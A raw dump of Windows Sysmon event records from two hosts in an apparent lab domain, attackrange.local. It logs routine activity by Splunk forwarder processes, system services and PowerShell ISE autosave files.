19:18:06.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606059Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.054{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606058Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.054{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FB4D18D5B6D747CF98FC3998CBF4C46,SHA256=F48EAE814EF2C169914B730A3EF622690CD6851796E62159CC0C5E18C77C8137falsefalse - insufficient disk space 11241100x80000000000000001606057Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.054{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606056Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:06.054{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DEF094076F5A5DD5F2047CB984FA273B,SHA256=30CA25C8937A887CC7C4B86DAA6FEDF91B5205ECEA0379BB36BCFDC2AEFDD871falsefalse - insufficient disk space 23542300x80000000000000001095057Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.969{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=359531799EF0E813A8E4DCC44DA0C555,SHA256=312F1C980CFE391C4E0DD5BD98AFE9A02116EC9DFE2D8EDB8A342B4493F25AD6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606064Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:07.573{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606063Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:07.573{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=471D9595F3F21721EFE5F0E2EC5F9032,SHA256=C277A87BBE2BADD20422E536AE8EB28566BBE073902134AAC3BF3F7510B44A05falsefalse - insufficient disk space 10341000x80000000000000001095056Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095055Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095054Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.059{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A6F-6080-945F-00000000BA01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095053Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.058{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095052Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.058{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095051Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.057{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095050Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.057{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095049Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.057{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-7A6F-6080-945F-00000000BA01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095048Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.057{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A6F-6080-945F-00000000BA01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095047Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:07.056{761B69BB-7A6F-6080-945F-00000000BA01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095062Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:08.973{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF720E0BA433D36C4FBF0979B92C8D3,SHA256=8D1C70659C95CBDAC11536C47535C7FE050BB0B511F56423D7094306B191974C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606070Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.576{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606069Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.576{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3357E2EEB013D544AED1A3852CABDA7,SHA256=FA856B996EB5738623D439BB153CFBF260BC6CC7850611642D4EDE01AF82A61Efalsefalse - insufficient disk space 354300x80000000000000001095061Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:03.763{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1145-false10.0.1.12-8000- 10341000x80000000000000001095060Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:08.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095059Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:08.494{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095058Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:08.276{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82DF35307BB9C91581B3348696A2F2ED,SHA256=6522646607BA2AA4E9093B84FDEFFE48FB97021AA9A62CF2233C91E6E208936D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001606068Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.121{21761711-3770-607F-F339-00000000BB01}6452WIN-HOST-5\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6452.xml~RFb940e57.TMPMD5=FABC111312CD43093B0ECB217784AE61,SHA256=E4C54946B4732E720A02A0F783874B6D71E92ED837209F7EBDA4D14779023557falsefalse - insufficient disk space 11241100x80000000000000001606067Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.121{21761711-3770-607F-F339-00000000BB01}6452C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\6452.xml~RFb940e57.TMP2021-04-21 19:18:08.121 254200x80000000000000001606066Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.121{21761711-3770-607F-F339-00000000BB01}6452C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\ecivaw1u.tmp2021-04-20 20:22:02.3742021-04-21 19:18:08.121 11241100x80000000000000001606065Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:08.121{21761711-3770-607F-F339-00000000BB01}6452C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\ecivaw1u.tmp2021-04-21 19:18:08.121 10341000x80000000000000001095073Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.992{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-7A71-6080-955F-00000000BA01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095072Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.990{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095071Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.990{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095070Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.990{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095069Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.989{761B69BB-818C-607D-0C00-00000000BA01}8447060C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095068Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.989{761B69BB-818A-607D-0500-00000000BA01}408424C:\Windows\system32\csrss.exe{761B69BB-7A71-6080-955F-00000000BA01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001095067Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.989{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-7A71-6080-955F-00000000BA01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001095066Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.989{761B69BB-7A71-6080-955F-00000000BA01}6340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001095065Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.984{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A74EE2D1EE3AC639AD9DD5FDE8F8BB13,SHA256=9BDAD3303BEFC88B44C24800D9E957C245B608A0F66FE1AA24460A955431FBFD,IMPHASH=00000000000000000000000000000000falsetrue 